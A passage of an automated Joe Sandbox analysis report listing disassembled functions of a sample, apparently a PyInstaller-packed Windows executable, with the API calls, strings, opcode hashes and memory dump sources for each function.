                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                        • API String ID: 190572456-3427451314
                                                                                                                                                                                                                        • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction ID: 2b32d1391c627165d698c93d92138e8bbb71464e3253f1fbaed014dad6877f6f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1E17968A5EB1390FB59BF54A8501B4A3A5AF48760FD410B5C83D072E4EFFCE948D2E1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F24F3FA4,00000000,00007FF7F24F1925), ref: 00007FF7F24F86E9
                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F24F7C97,?,?,FFFFFFFF,00007FF7F24F3834), ref: 00007FF7F24F782C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F26C0: MessageBoxW.USER32 ref: 00007FF7F24F2736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                        • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction ID: f9c0329967d3076384e5435ecf9ce43ada20d98c4f216951dbfa07606249eb85
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A417F21B2964281FB50FB25E8516BAE261AFC8780FC45031DA7E436D5EEECE904C7E1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                        • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction ID: c207c2fe96b3d4da4c12734f19800d9cd86dc69200e1adf5dc7290cce757e58e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651F726604BA186D7349F22A4181BAF7A1F798B61F404135EFEE43794DFBCD045CB20
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                        • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction ID: 592aa068e76b161936f1b55a260549e684eaf67f0eb96e9ee48f21353dea1455
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC128062E0824386FB20FE15D954379E651FB80750FD44076E6AA476C4FFBCE984CBA4
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                        • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction ID: 304f7198d5ffe4e35cc94dc911a0afe2e85398cb7d21020ba58979efe94d5917
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B812A321E0C18386FB24FE15E8147B9E252FB90754FD84171E6A9475CCEBBCE588CBA4
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: b0576d739348d175249d0d30081f86d4c4af119df9e54cb96bd0ca74f2b2cf99
                                                                                                                                                                                                                        • Instruction ID: aa1cfba83c273cf22e2dc46a98029437902d9f9df779b8ecc7d5069a972d3fe2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0576d739348d175249d0d30081f86d4c4af119df9e54cb96bd0ca74f2b2cf99
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC417C21B0864292EB11BB12A9505B6E691BF88BD4F845031DD7D07BD5EEFCE905CBA0
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: ef07a778ac6f4b189d319a3b2c4a36142f4d2eafadce42c8ab3247a85c27709a
                                                                                                                                                                                                                        • Instruction ID: 4c852eb40236947f756cb751b94a7b1252736ff5e6f08305782c5b2651a456b9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef07a778ac6f4b189d319a3b2c4a36142f4d2eafadce42c8ab3247a85c27709a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA415021B0864382EB20BB15A9505B6E3A0EF84B94FD45031DE7E07AD5EFFCE945CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                        • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction ID: 60a4b3d528a0d81ef122d8c5d6f9e0e809b4b1384dde48734e8813c7aa5a76b8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6D16E32A08A418AEB20EB65D4403BDB7A0FBD5788F500135EE6D57BD5DFB8E881C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD06D
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD07B
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD0A5
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD113
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F24FD29A,?,?,?,00007FF7F24FCF8C,?,?,?,00007FF7F24FCB89), ref: 00007FF7F24FD11F
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                        • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction ID: faf3904b7a9b263972f907c1f8751e561ca12767ac7b47ceb65db5a53393ebc2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3631C52571A642C5EF11BB52A800175A394BF88B68F990535DD3D077C4DFFCE842C7A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                        • Instruction ID: 725f8d7a0293af2804753239da40433c2b76099fa6d9ee8af2b16118fd845b8c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21AF25A0C65342FB68FF615A4517CE1525F487B0F9407B4DA3E0BADAFDACB400C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                        • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction ID: ec8acafa978b0dad1182107668e5814f367463c4f8853bcec9570611c6a7afd7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D119031B18B4286E750AF56E854329A2A0FB88BF4F841274EA2D877D4DFBCE404C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F821D
                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F827A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F24F86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F24F3FA4,00000000,00007FF7F24F1925), ref: 00007FF7F24F86E9
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8305
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8364
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F8375
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7F24F39F2), ref: 00007FF7F24F838A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                        • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction ID: 5ad1520c462c56ad0de67f23084335b386deeb2e96a932fe45747cd30428790c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB41A462A1968281EB30AB11A4102BAB394FFC9B80F854135DF7D5BBD5DEFCE801C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A5E7
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A61D
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A64A
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A65B
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A66C
                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A,?,?,?,?,00007FF7F250649F), ref: 00007FF7F250A687
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                        • Instruction ID: 7469fd31dbf96ecdb77b1f96fcc2aa4d74857528f80572f5ce3b906542680a73
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27119D21E0865342FB68FFA15A51178E2525F487B0F9443B4DA3E0B7D6FEACB400C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                        • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction ID: b44d5b505f4816dc323e175d8faa42a9de21cd907febaae9aab9dbcfdd6134b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF318232609A8289EB20EF61E8552FAB360FF89794F840135EE6D47B99DFBCD504C750
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                        • API String ID: 1878133881-640379615
                                                                                                                                                                                                                        • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction ID: 231e793895f5eea59f7acf7d6fbdef1e69661cef1247993db60a5348d851f1fc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10217672628A8681E720EB10F4517EAA364FFC4784FC01136EA9C03AD9DFBCD645CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                        • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction ID: 3fb21da7511cd775c2c3ca35b3875cde41e40d22da597acbd6ea60344f182f72
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F0AF25B1870282EB10AF24A859739A320AF59760FC41675C57D8B1F0DFACD049C3A0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction ID: b750d9aebd17cbc6c93b4750d7b4e3b991bb167016ad965e6cd225ea04402681
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6118F32F58E0342F7743928E45D37991406F65374F950AB4E97E0F6D68EADA841C1B0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A6BF
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A6DE
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A706
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A717
                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7F25098B3,?,?,00000000,00007FF7F2509B4E,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F250A728
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                        • String ID:
